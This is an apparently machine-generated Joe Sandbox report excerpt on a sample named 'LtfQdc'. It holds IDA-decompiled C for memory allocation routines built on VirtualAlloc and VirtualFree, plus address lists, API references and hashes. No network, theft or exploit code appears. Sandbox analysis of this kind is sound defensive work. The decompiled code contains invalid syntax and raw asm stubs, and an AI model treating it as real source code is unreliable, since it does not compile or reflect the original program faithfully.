																__eflags = (_t156 & _t168) - _v0;
																if((_t156 & _t168) == _v0) {
																	L44:
																	return _t156;
																} else {
																	_t92 = VirtualFree(_t156, 0, 0x8000);
																	__eflags = _t92;
																	if(_t92 == 0) {
																		L46:
																		asm("int3");
																		asm("ud2");
																		goto L47;
																	} else {
																		_t142 = _v8;
																		asm("lock sub [0xd54b84], edx");
																		_t89 = _v36;
																		L23:
																		_v40 = _t168;
																		_t170 = _v0;
																		_t117 = (_t156 + _t168 & _t89) + _t170;
																		_t91 = E00CDC090(_t117, _t117, _t142, _t156 + _t168 & _t89, _t170, _t198, _a4, _a8);
																		_t188 = _t188 + 8;
																		__eflags = _t91;
																		if(_t91 == 0) {
																			__eflags = _t117;
																			_t127 = _v8;
																			if(_t117 == 0) {
																				L41:
																				_t156 = 0;
																				goto L44;
																			} else {
																				goto L28;
																			}
																		} else {
																			_t156 = _t91;
																			__eflags = (_t91 & _v40) - _t170;
																			if((_t91 & _v40) == _t170) {
																				goto L44;
																			} else {
																				_t92 = VirtualFree(_t156, 0, 0x8000);
																				__eflags = _t92;
																				if(_t92 == 0) {
																					goto L46;
																				} else {
																					_t127 = _v8;
																					asm("lock sub [0xd54b84], ecx");
																					_t170 = _v0;
																					L28:
																					_t92 = _v4;
																					_t119 = _t127 + _t92 + 0xffff0000;
																					__eflags = _t119 - _t127;
																					if(_t119 < _t127) {
																						L47:
																						asm("int3");
																						asm("ud2");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						_push(_t180);
																						_push(_v52);
																						_push(_v56);
																						_push(0);
																						_push(_v60);
																						_push(_v64);
																						_push(_v68);
																						L16();
																						return _t92;
																					} else {
																						_v36 = _t92 + 0xffff0000;
																						__eflags = _a4;
																						_v44 = (0 | _a4 != 0x00000000 | 0x00000002) << 0xc;
																						_t156 = 0;
																						asm("o16 nop [cs:eax+eax]");
																						while(1) {
																							_t98 = E00CDC090(_t119, 0, _t119, _t156, _t170, _t198, _a4, _a8);
																							_t188 = _t188 + 8;
																							__eflags = _t98;
																							if(_t98 == 0) {
																								goto L44;
																							}
																							_t130 = _t98 & _v40;
																							__eflags = _t130 - _t170;
																							_t145 =  >  ? _v4 : 0;
																							_t173 = _t170 + _t98 - _t130 + ( >  ? _v4 : 0);
																							_t132 = _t173 - _t98;
																							__eflags = _v36 - _t132 | _t132;
																							if((_v36 - _t132 | _t132) == 0) {
																								L43:
																								_t156 = _t98;
																								goto L44;
																							} else {
																								_t92 = VirtualFree(_t98, 0, 0x8000);
																								__eflags = _t92;
																								if(_t92 == 0) {
																									asm("int3");
																									asm("ud2");
																									goto L46;
																								} else {
																									asm("lock sub [0xd54b84], ebx");
																									_t133 = _a4 - 1;
																									__eflags = _t133 - 5;
																									_t149 = _v8;
																									if(_t133 > 5) {
																										_t100 = 1;
																										asm("o16 nop [cs:eax+eax]");
																									} else {
																										switch( *((intOrPtr*)(_t133 * 4 +  &M00D364B4))) {
																											case 0:
																												goto L39;
																											case 1:
																												_t100 = 4;
																												goto L39;
																											case 2:
																												__eax = 0x20;
																												goto L39;
																											case 3:
																												__eax = 0x40;
																												goto L39;
																										}
																									}
																									L39:
																									_t98 = VirtualAlloc(_t173, _t149, _v44, _t100);
																									__eflags = _t98;
																									if(_t98 != 0) {
																										asm("lock add [0xd54b84], ecx");
																										goto L43;
																									} else {
																										 *0xd54b80 = GetLastError();
																										_t170 = _v0;
																										continue;
																									}
																								}
																							}
																							goto L78;
																						}
																						goto L44;
																					}
																				}
																			}
																		}
																	}
																}
															}
														} else {
															goto L14;
														}
													}
													goto L78;
												case 1:
													L7:
													_t87 = VirtualAlloc(_t86, _t164, 0x1000, _t124); // executed
													if(_t87 != 0) {
														L14:
														return _t87;
													} else {
														_t87 = GetLastError();
														_t194 = _t87 - 0x5af;
														if(_t87 == 0x5af) {
															_push(_t164);
															_t87 = L00CD0DD0(_t140, _t194, _t198);
														}
														if(_t87 == 0) {
															goto L14;
														} else {
															asm("int3");
															asm("ud2");
															goto L12;
														}
													}
													goto L78;
												case 2:
													_t124 = 4;
													goto L7;
												case 3:
													__ecx = 0x20;
													goto L7;
												case 4:
													__ecx = 0x40;
													goto L7;
											}
										}
									} else {
										goto L75;
									}
								}
							} else {
								asm("lock sub [0xd54b84], esi");
								 *0xd54b88 = 0;
								 *0xd54b8c = 0;
								goto L64;
							}
						}
					} else {
						goto L58;
					}
				} else {
					_t162 = _t74;
					L56:
					asm("lock add [0xd54b84], edi");
					L58:
					return _t162;
				}
				L78:
			}

0x00cdc090
0x00cdc090
0x00cdc090
0x00cdc090
0x00cdc090
0x00cdc093
0x00cdc094
0x00cdc095
0x00cdc096
0x00cdc099
0x00cdc09c
0x00cdc0a2
0x00cdc0a5
0x00cdc0a7
0x00cdc0ac
0x00000000
0x00000000
0x00000000
0x00cdc0b3
0x00000000
0x00000000
0x00cdc0ba
0x00000000
0x00000000
0x00cdc0c1
0x00000000
0x00000000
0x00cdc0ac
0x00cdc0cd
0x00cdc0cf
0x00cdc0d7
0x00cdc0de
0x00cdc0e1
0x00cdc0e3
0x00cdc0e9
0x00cdc0eb
0x00cdc0f8
0x00cdc0fb
0x00cdc101
0x00cdc101
0x00cdc107
0x00cdc109
0x00cdc10c
0x00cdc10e
0x00cdc11f
0x00cdc125
0x00cdc127
0x00cdc12e
0x00cdc12e
0x00cdc133
0x00cdc138
0x00cdc13a
0x00cdc173
0x00cdc178
0x00cdc17e
0x00cdc181
0x00cdc184
0x00cdc1a3
0x00cdc1a8
0x00cdc186
0x00cdc18b
0x00cdc18e
0x00000000
0x00000000
0x00000000
0x00cdc195
0x00000000
0x00000000
0x00cdc19c
0x00000000
0x00000000
0x00cdc1ad
0x00000000
0x00000000
0x00cdc18e
0x00cdc1b2
0x00cdc1b8
0x00cdc1be
0x00cdc1c0
0x00cdc1c2
0x00000000
0x00cdc1c8
0x00cdc1ce
0x00cdc1ce
0x00000000
0x00cdc13c
0x00cdc13c
0x00cdc14a
0x00cdc150
0x00cdc152
0x00cdc1d9
0x00cdc1da
0x00cdc1dc
0x00cdc1dd
0x00cdc1de
0x00cdc1df
0x00cdc1e0
0x00cdc1e1
0x00cdc1ee
0x00cdc1f4
0x00cdc1f6
0x00cdc203
0x00cdc203
0x00cdc1f8
0x00cdc1f8
0x00cdc1fe
0x00cdc200
0x00cdc204
0x00cdc205
0x00cdc207
0x00cdc208
0x00cdc209
0x00cdc20a
0x00cdc20b
0x00cdc20c
0x00cdc20d
0x00cdc20e
0x00cdc20f
0x00cdc213
0x00cdbdd0
0x00cdbdd1
0x00cdbdd4
0x00cdbdd7
0x00cdbdda
0x00cdbde0
0x00cdbdfc
0x00000000
0x00cdbde2
0x00cdbde7
0x00000000
0x00cdbe34
0x00cdbe3b
0x00cdbe43
0x00000000
0x00cdbe45
0x00cdbe45
0x00cdbe4d
0x00cdbe52
0x00cdbe53
0x00cdbe55
0x00cdbe56
0x00cdbe57
0x00cdbe58
0x00cdbe59
0x00cdbe5a
0x00cdbe5b
0x00cdbe5c
0x00cdbe5d
0x00cdbe5e
0x00cdbe5f
0x00cdbe60
0x00cdbe61
0x00cdbe63
0x00cdbe64
0x00cdbe65
0x00cdbe66
0x00cdbe69
0x00cdbe6e
0x00cdbe70
0x00cdbe73
0x00cdbe76
0x00cdbe78
0x00cdbe7a
0x00cdbe7f
0x00cdbe86
0x00cdbe86
0x00cdbe86
0x00cdbe89
0x00cdbe8c
0x00cdbe97
0x00cdbe9c
0x00cdbe9f
0x00cdbea1
0x00cdbea3
0x00cdbed7
0x00cdbed9
0x00cdbedc
0x00cdbedf
0x00000000
0x00000000
0x00000000
0x00000000
0x00cdbea5
0x00cdbea9
0x00cdbeac
0x00cdc054
0x00cdc05d
0x00cdbeb2
0x00cdbeba
0x00cdbec0
0x00cdbec2
0x00cdc061
0x00cdc061
0x00cdc062
0x00000000
0x00cdbec8
0x00cdbec8
0x00cdbecb
0x00cdbed2
0x00cdbee5
0x00cdbee5
0x00cdbeee
0x00cdbef1
0x00cdbefb
0x00cdbf00
0x00cdbf03
0x00cdbf05
0x00cdbf3b
0x00cdbf3d
0x00cdbf40
0x00cdc044
0x00cdc044
0x00000000
0x00000000
0x00000000
0x00000000
0x00cdbf07
0x00cdbf07
0x00cdbf0e
0x00cdbf10
0x00000000
0x00cdbf16
0x00cdbf1e
0x00cdbf24
0x00cdbf26
0x00000000
0x00cdbf2c
0x00cdbf2c
0x00cdbf2f
0x00cdbf36
0x00cdbf46
0x00cdbf46
0x00cdbf4c
0x00cdbf52
0x00cdbf54
0x00cdc064
0x00cdc064
0x00cdc065
0x00cdc067
0x00cdc068
0x00cdc069
0x00cdc06a
0x00cdc06b
0x00cdc06c
0x00cdc06d
0x00cdc06e
0x00cdc06f
0x00cdc070
0x00cdc073
0x00cdc076
0x00cdc079
0x00cdc07b
0x00cdc07e
0x00cdc081
0x00cdc084
0x00cdc08d
0x00cdbf5a
0x00cdbf5f
0x00cdbf64
0x00cdbf71
0x00cdbf74
0x00cdbf76
0x00cdbf80
0x00cdbf8a
0x00cdbf8f
0x00cdbf92
0x00cdbf94
0x00000000
0x00000000
0x00cdbf9c
0x00cdbf9f
0x00cdbfa6
0x00cdbfae
0x00cdbfb2
0x00cdbfb9
0x00cdbfbb
0x00cdc052
0x00cdc052
0x00000000
0x00cdbfc1
0x00cdbfc9
0x00cdbfcf
0x00cdbfd1
0x00cdc05e
0x00cdc05f
0x00000000
0x00cdbfd7
0x00cdbfd7
0x00cdbfe1
0x00cdbfe4
0x00cdbfe7
0x00cdbfea
0x00cdc00e
0x00cdc013
0x00cdbfec
0x00cdbff1
0x00000000
0x00000000
0x00000000
0x00cdbff8
0x00000000
0x00000000
0x00cdc000
0x00000000
0x00000000
0x00cdc007
0x00000000
0x00000000
0x00cdbff1
0x00cdc020
0x00cdc026
0x00cdc02c
0x00cdc02e
0x00cdc04b
0x00000000
0x00cdc030
0x00cdc036
0x00cdc03c
0x00000000
0x00cdc03c
0x00cdc02e
0x00cdbfd1
0x00000000
0x00cdbfbb
0x00000000
0x00cdbf80
0x00cdbf54
0x00cdbf26
0x00cdbf10
0x00cdbf05
0x00cdbec2
0x00cdbeac
0x00000000
0x00000000
0x00000000
0x00cdbe4d
0x00000000
0x00000000
0x00cdbe08
0x00cdbe10
0x00cdbe18
0x00cdbe4f
0x00cdbe51
0x00cdbe1a
0x00cdbe1a
0x00cdbe20
0x00cdbe25
0x00cdbe27
0x00cdbe28
0x00cdbe28
0x00cdbe2f
0x00000000
0x00cdbe31
0x00cdbe31
0x00cdbe32
0x00000000
0x00cdbe32
0x00cdbe2f
0x00000000
0x00000000
0x00cdbdee
0x00000000
0x00000000
0x00cdbdf5
0x00000000
0x00000000
0x00cdbe03
0x00000000
0x00000000
0x00cdbde7
0x00000000
0x00000000
0x00000000
0x00cdc200
0x00cdc158
0x00cdc158
0x00cdc15f
0x00cdc169
0x00000000
0x00cdc169
0x00cdc152
0x00000000
0x00000000
0x00000000
0x00cdc0ed
0x00cdc0ed
0x00cdc0ef
0x00cdc0ef
0x00cdc110
0x00cdc119
0x00cdc119
0x00000000

APIs

VirtualAlloc.KERNEL32(?,-FFE00000,00000000,00000001,00CDBE9C,?,?,-FFE00000,?,?,?,00CC6157,00000000), ref: 00CDC0E3
GetLastError.KERNEL32(?,00CC6157,00000000), ref: 00CDC0FB
TryAcquireSRWLockExclusive.KERNEL32(00D54B90,?,00CC6157,00000000), ref: 00CDC11F
VirtualFree.KERNEL32(?,00000000,00008000,?,00CC6157,00000000), ref: 00CDC14A
ReleaseSRWLockExclusive.KERNEL32(00D54B90,?,00CC6157,00000000), ref: 00CDC178
VirtualAlloc.KERNEL32(?,?,00000000,00000001,?,00CC6157,00000000), ref: 00CDC1B8
GetLastError.KERNEL32(?,00CC6157,00000000), ref: 00CDC1C8
VirtualAlloc.KERNEL32(00000000,?,00001000,?,?,00CC6157,00000000), ref: 00CDC260
VirtualFree.KERNEL32(00000040,?,00004000,?,00CC6157,00000000), ref: 00CDC275

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: Virtual$Alloc$ErrorExclusiveFreeLastLock$AcquireRelease
String ID:
API String ID: 3229969321-0
Opcode ID: 2e34928406bf8d4542f283873573c5ccb33eabfb060edec16de5bb1163a9dfea
Instruction ID: f830abbbe8bdb1d8f0e62bcc10d297c6b23ca570849e025a4b49bde6268901ee
Opcode Fuzzy Hash: 2e34928406bf8d4542f283873573c5ccb33eabfb060edec16de5bb1163a9dfea
Instruction Fuzzy Hash: F941B071A043169BE7208BA5EC8976B3369E780765F144027EB15E7390DB74EC84DBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00CDBDA0 Relevance: 6.3, APIs: 5, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E00CDBDA0(void* __ebx, void* __edi, void* __esi, void* __fp0, void* _a4, signed int _a8, void* _a12, intOrPtr _a16) {
				long _v0;
				long _v4;
				void* _v8;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				long _v36;
				void* _t57;
				void* _t80;
				long _t89;
				signed int _t102;
				void* _t112;
				long _t119;
				void* _t130;
				void* _t133;
				void* _t139;

				_t139 = __fp0;
				_t112 = __edi;
				_t80 = __ebx;
				if(VirtualFree(_a4, 0, 0x8000) == 0) {
					asm("int3");
					asm("ud2");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_t130 = _t133;
					_t102 = _a8;
					_t119 = _a4;
					_t57 = _v0;
					if(_t102 > 6) {
						_t89 = 1;
						goto L9;
					} else {
						switch( *((intOrPtr*)(_t102 * 4 +  &M00D36498))) {
							case 0:
								L14:
								_t58 = VirtualFree(_t58, _t119, 0x4000);
								__eflags = _t58;
								if(_t58 != 0) {
									goto L16;
								} else {
									_t58 = GetLastError();
									__eflags = _t58;
									if(_t58 != 0) {
										asm("int3");
										asm("ud2");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t130);
										_t131 = _t133;
										_push(_t80);
										_push(_t112);
										_push(_t119);
										_t134 = _t133 - 0xc;
										_t113 = _v0;
										_t122 =  ~_t113;
										_t103 = _v4;
										_t81 = _v8;
										__eflags = _t81;
										if(_t81 == 0) {
											_t78 = E00CEC500();
											_t103 = _v0;
											_t81 = (_t78 & _t122) + _a8;
											__eflags = _t81;
										}
										_v28 = _t122;
										_t123 = _t113 - 1;
										_t59 = E00CDC090(_t81, _t81, _t103, _t113, _t123, _t139, _a12, _a16);
										_t135 = _t134 + 8;
										_t114 = _t59;
										__eflags = _t59;
										if(_t59 == 0) {
											__eflags = _t81;
											_t104 = _v0;
											_t60 = _v28;
											if(_t81 == 0) {
												goto L43;
											} else {
												goto L25;
											}
										} else {
											__eflags = (_t114 & _t123) - _a8;
											if((_t114 & _t123) == _a8) {
												L46:
												return _t114;
											} else {
												_t63 = VirtualFree(_t114, 0, 0x8000);
												__eflags = _t63;
												if(_t63 == 0) {
													L48:
													asm("int3");
													asm("ud2");
													goto L49;
												} else {
													_t104 = _v0;
													asm("lock sub [0xd54b84], edx");
													_t60 = _v28;
													L25:
													_v32 = _t123;
													_t125 = _a8;
													_t84 = (_t114 + _t123 & _t60) + _t125;
													_t62 = E00CDC090(_t84, _t84, _t104, _t114 + _t123 & _t60, _t125, _t139, _a12, _a16);
													_t135 = _t135 + 8;
													__eflags = _t62;
													if(_t62 == 0) {
														__eflags = _t84;
														_t92 = _v0;
														if(_t84 == 0) {
															L43:
															_t114 = 0;
															goto L46;
														} else {
															goto L30;
														}
													} else {
														_t114 = _t62;
														__eflags = (_t62 & _v32) - _t125;
														if((_t62 & _v32) == _t125) {
															goto L46;
														} else {
															_t63 = VirtualFree(_t114, 0, 0x8000);
															__eflags = _t63;
															if(_t63 == 0) {
																goto L48;
															} else {
																_t92 = _v0;
																asm("lock sub [0xd54b84], ecx");
																_t125 = _a8;
																L30:
																_t63 = _a4;
																_t86 = _t92 + _t63 + 0xffff0000;
																__eflags = _t86 - _t92;
																if(_t86 < _t92) {
																	L49:
																	asm("int3");
																	asm("ud2");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	_push(_t131);
																	_push(_v20);
																	_push(_v24);
																	_push(0);
																	_push(_v28);
																	_push(_v32);
																	_push(_v36);
																	L18();
																	return _t63;
																} else {
																	_v28 = _t63 + 0xffff0000;
																	__eflags = _a12;
																	_v36 = (0 | _a12 != 0x00000000 | 0x00000002) << 0xc;
																	_t114 = 0;
																	asm("o16 nop [cs:eax+eax]");
																	while(1) {
																		_t69 = E00CDC090(_t86, 0, _t86, _t114, _t125, _t139, _a12, _a16);
																		_t135 = _t135 + 8;
																		__eflags = _t69;
																		if(_t69 == 0) {
																			goto L46;
																		}
																		_t95 = _t69 & _v32;
																		__eflags = _t95 - _t125;
																		_t107 =  >  ? _a4 : 0;
																		_t128 = _t125 + _t69 - _t95 + ( >  ? _a4 : 0);
																		_t97 = _t128 - _t69;
																		__eflags = _v28 - _t97 | _t97;
																		if((_v28 - _t97 | _t97) == 0) {
																			L45:
																			_t114 = _t69;
																			goto L46;
																		} else {
																			_t63 = VirtualFree(_t69, 0, 0x8000);
																			__eflags = _t63;
																			if(_t63 == 0) {
																				asm("int3");
																				asm("ud2");
																				goto L48;
																			} else {
																				asm("lock sub [0xd54b84], ebx");
																				_t98 = _a12 - 1;
																				__eflags = _t98 - 5;
																				_t111 = _v0;
																				if(_t98 > 5) {
																					_t71 = 1;
																					asm("o16 nop [cs:eax+eax]");
																				} else {
																					switch( *((intOrPtr*)(_t98 * 4 +  &M00D364B4))) {
																						case 0:
																							goto L41;
																						case 1:
																							_t71 = 4;
																							goto L41;
																						case 2:
																							goto L41;
																						case 3:
																							goto L41;
																					}
																				}
																				L41:
																				_t69 = VirtualAlloc(_t128, _t111, _v36, _t71);
																				__eflags = _t69;
																				if(_t69 != 0) {
																					asm("lock add [0xd54b84], ecx");
																					goto L45;
																				} else {
																					 *0xd54b80 = GetLastError();
																					_t125 = _a8;
																					continue;
																				}
																			}
																		}
																		goto L51;
																	}
																	goto L46;
																}
															}
														}
													}
												}
											}
										}
									} else {
										goto L16;
									}
								}
								goto L51;
							case 1:
								L9:
								_t58 = VirtualAlloc(_t57, _t119, 0x1000, _t89); // executed
								__eflags = _t58;
								if(_t58 != 0) {
									L16:
									return _t58;
								} else {
									_t58 = GetLastError();
									__eflags = _t58 - 0x5af;
									if(__eflags == 0) {
										_push(_t119);
										_t58 = L00CD0DD0(_t102, __eflags, _t139);
									}
									__eflags = _t58;
									if(_t58 == 0) {
										goto L16;
									} else {
										asm("int3");
										asm("ud2");
										goto L14;
									}
								}
								goto L51;
							case 2:
								_t89 = 4;
								goto L9;
							case 3:
								__ecx = 0x20;
								goto L9;
							case 4:
								__ecx = 0x40;
								goto L9;
						}
					}
				} else {
					asm("lock sub [0xd54b84], eax");
					return _a8;
				}
				L51:
			}

0x00cdbda0
0x00cdbda0
0x00cdbda0
0x00cdbdb5
0x00cdbdc3
0x00cdbdc4
0x00cdbdc6
0x00cdbdc7
0x00cdbdc8
0x00cdbdc9
0x00cdbdca
0x00cdbdcb
0x00cdbdcc
0x00cdbdcd
0x00cdbdce
0x00cdbdcf
0x00cdbdd1
0x00cdbdd4
0x00cdbdd7
0x00cdbdda
0x00cdbde0
0x00cdbdfc
0x00000000
0x00cdbde2
0x00cdbde7
0x00000000
0x00cdbe34
0x00cdbe3b
0x00cdbe41
0x00cdbe43
0x00000000
0x00cdbe45
0x00cdbe45
0x00cdbe4b
0x00cdbe4d
0x00cdbe52
0x00cdbe53
0x00cdbe55
0x00cdbe56
0x00cdbe57
0x00cdbe58
0x00cdbe59
0x00cdbe5a
0x00cdbe5b
0x00cdbe5c
0x00cdbe5d
0x00cdbe5e
0x00cdbe5f
0x00cdbe60
0x00cdbe61
0x00cdbe63
0x00cdbe64
0x00cdbe65
0x00cdbe66
0x00cdbe69
0x00cdbe6e
0x00cdbe70
0x00cdbe73
0x00cdbe76
0x00cdbe78
0x00cdbe7a
0x00cdbe7f
0x00cdbe86
0x00cdbe86
0x00cdbe86
0x00cdbe89
0x00cdbe8c
0x00cdbe97
0x00cdbe9c
0x00cdbe9f
0x00cdbea1
0x00cdbea3
0x00cdbed7
0x00cdbed9
0x00cdbedc
0x00cdbedf
0x00000000
0x00000000
0x00000000
0x00000000
0x00cdbea5
0x00cdbea9
0x00cdbeac
0x00cdc054
0x00cdc05d
0x00cdbeb2
0x00cdbeba
0x00cdbec0
0x00cdbec2
0x00cdc061
0x00cdc061
0x00cdc062
0x00000000
0x00cdbec8
0x00cdbec8
0x00cdbecb
0x00cdbed2
0x00cdbee5
0x00cdbee5
0x00cdbeee
0x00cdbef1
0x00cdbefb
0x00cdbf00
0x00cdbf03
0x00cdbf05
0x00cdbf3b
0x00cdbf3d
0x00cdbf40
0x00cdc044
0x00cdc044
0x00000000
0x00000000
0x00000000
0x00000000
0x00cdbf07
0x00cdbf07
0x00cdbf0e
0x00cdbf10
0x00000000
0x00cdbf16
0x00cdbf1e
0x00cdbf24
0x00cdbf26
0x00000000
0x00cdbf2c
0x00cdbf2c
0x00cdbf2f
0x00cdbf36
0x00cdbf46
0x00cdbf46
0x00cdbf4c
0x00cdbf52
0x00cdbf54
0x00cdc064
0x00cdc064
0x00cdc065
0x00cdc067
0x00cdc068
0x00cdc069
0x00cdc06a
0x00cdc06b
0x00cdc06c
0x00cdc06d
0x00cdc06e
0x00cdc06f
0x00cdc070
0x00cdc073
0x00cdc076
0x00cdc079
0x00cdc07b
0x00cdc07e
0x00cdc081
0x00cdc084
0x00cdc08d
0x00cdbf5a
0x00cdbf5f
0x00cdbf64
0x00cdbf71
0x00cdbf74
0x00cdbf76
0x00cdbf80
0x00cdbf8a
0x00cdbf8f
0x00cdbf92
0x00cdbf94
0x00000000
0x00000000
0x00cdbf9c
0x00cdbf9f
0x00cdbfa6
0x00cdbfae
0x00cdbfb2
0x00cdbfb9
0x00cdbfbb
0x00cdc052
0x00cdc052
0x00000000
0x00cdbfc1
0x00cdbfc9
0x00cdbfcf
0x00cdbfd1
0x00cdc05e
0x00cdc05f
0x00000000
0x00cdbfd7
0x00cdbfd7
0x00cdbfe1
0x00cdbfe4
0x00cdbfe7
0x00cdbfea
0x00cdc00e
0x00cdc013
0x00cdbfec
0x00cdbff1
0x00000000
0x00000000
0x00000000
0x00cdbff8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00cdbff1
0x00cdc020
0x00cdc026
0x00cdc02c
0x00cdc02e
0x00cdc04b
0x00000000
0x00cdc030
0x00cdc036
0x00cdc03c
0x00000000
0x00cdc03c
0x00cdc02e
0x00cdbfd1
0x00000000
0x00cdbfbb
0x00000000
0x00cdbf80
0x00cdbf54
0x00cdbf26
0x00cdbf10
0x00cdbf05
0x00cdbec2
0x00cdbeac
0x00000000
0x00000000
0x00000000
0x00cdbe4d
0x00000000
0x00000000
0x00cdbe08
0x00cdbe10
0x00cdbe16
0x00cdbe18
0x00cdbe4f
0x00cdbe51
0x00cdbe1a
0x00cdbe1a
0x00cdbe20
0x00cdbe25
0x00cdbe27
0x00cdbe28
0x00cdbe28
0x00cdbe2d
0x00cdbe2f
0x00000000
0x00cdbe31
0x00cdbe31
0x00cdbe32
0x00000000
0x00cdbe32
0x00cdbe2f
0x00000000
0x00000000
0x00cdbdee
0x00000000
0x00000000
0x00cdbdf5
0x00000000
0x00000000
0x00cdbe03
0x00000000
0x00000000
0x00cdbde7
0x00cdbdb7
0x00cdbdba
0x00cdbdc2
0x00cdbdc2
0x00000000

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,?,00C922C9,00000003,-FFE00000,?,?,?,00CC6157,00000000), ref: 00CDBDAD

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 8686246e56a2eaec302a9ff3db8277b53d415fdc8c3dee6375ffbb3098fa3371
Instruction ID: 5fd12b45931a171f257a2aa055f0b428dedd3dfd9df4871b0576b86522f5c4bd
Opcode Fuzzy Hash: 8686246e56a2eaec302a9ff3db8277b53d415fdc8c3dee6375ffbb3098fa3371
Instruction Fuzzy Hash: FC016D30700308A7EA201B769D09B9B7B5DEB44BA1F154426FB19DBB90EB70EE4086A5

Uniqueness

Uniqueness Score: -1.00%

Function 00CD9960 Relevance: 4.7, APIs: 3, Instructions: 234
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 42%

			E00CD9960(signed int __ecx, signed short _a4, signed int _a8, intOrPtr _a12) {
				signed char _v0;
				void* _v16;
				void* _v20;
				signed int _v24;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed char _v44;
				signed int _v72;
				signed int _v76;
				char _v89;
				char _v92;
				char _v93;
				char _v96;
				char _v97;
				signed int _v100;
				char _v101;
				signed char _v104;
				signed int _v108;
				signed int _v112;
				signed short _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				char _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t757;
				signed int _t759;
				signed int _t764;
				signed int _t765;
				signed int _t768;
				signed int _t770;
				signed char _t772;
				signed char _t773;
				signed int* _t774;
				intOrPtr _t782;
				void* _t789;
				signed int _t791;
				void* _t792;
				char* _t795;
				signed int _t798;
				signed int _t805;
				signed int _t806;
				intOrPtr _t809;
				signed int _t811;
				signed int _t813;
				signed char _t815;
				signed char _t816;
				signed int* _t817;
				intOrPtr _t819;
				signed char _t821;
				signed int _t828;
				void* _t830;
				signed int _t834;
				signed int _t836;
				signed int _t838;
				signed char _t839;
				signed short _t840;
				signed int* _t841;
				intOrPtr _t849;
				signed int _t860;
				signed short _t861;
				signed int _t863;
				signed int _t867;
				signed int _t869;
				signed int _t870;
				signed short _t883;
				signed char _t885;
				signed int _t887;
				void* _t888;
				signed int _t892;
				signed int _t893;
				signed int _t895;
				signed char _t898;
				signed int _t899;
				signed int* _t900;
				intOrPtr _t902;
				signed int _t907;
				char* _t909;
				signed char _t919;
				signed short _t921;
				signed char _t922;
				signed int _t926;
				signed int _t928;
				signed int _t929;
				signed int _t932;
				signed int _t941;
				signed int _t943;
				signed int _t944;
				signed char _t952;
				signed int _t961;
				signed int _t965;
				signed char _t966;
				signed short _t967;
				signed int _t969;
				signed int _t971;
				signed int _t974;
				signed int _t976;
				signed int _t977;
				void* _t987;
				signed int _t990;
				signed char _t992;
				signed int _t993;
				void* _t999;
				signed int _t1001;
				signed int _t1002;
				signed char _t1004;
				signed int _t1010;
				signed int _t1016;
				signed int _t1017;
				signed char _t1018;
				signed int** _t1022;
				signed int _t1024;
				signed int _t1025;
				signed char _t1029;
				signed int _t1038;
				signed int _t1043;
				intOrPtr _t1046;
				unsigned int _t1047;
				signed int _t1058;
				signed int _t1059;
				signed char _t1060;
				signed int _t1064;
				signed char _t1066;
				signed int _t1072;
				signed int _t1078;
				signed int _t1081;
				intOrPtr _t1083;
				unsigned int _t1088;
				signed int _t1096;
				signed int _t1101;
				intOrPtr _t1104;
				unsigned int _t1105;
				signed int _t1116;
				signed int _t1117;
				signed int _t1121;
				signed int _t1131;
				signed int _t1136;
				signed int _t1138;
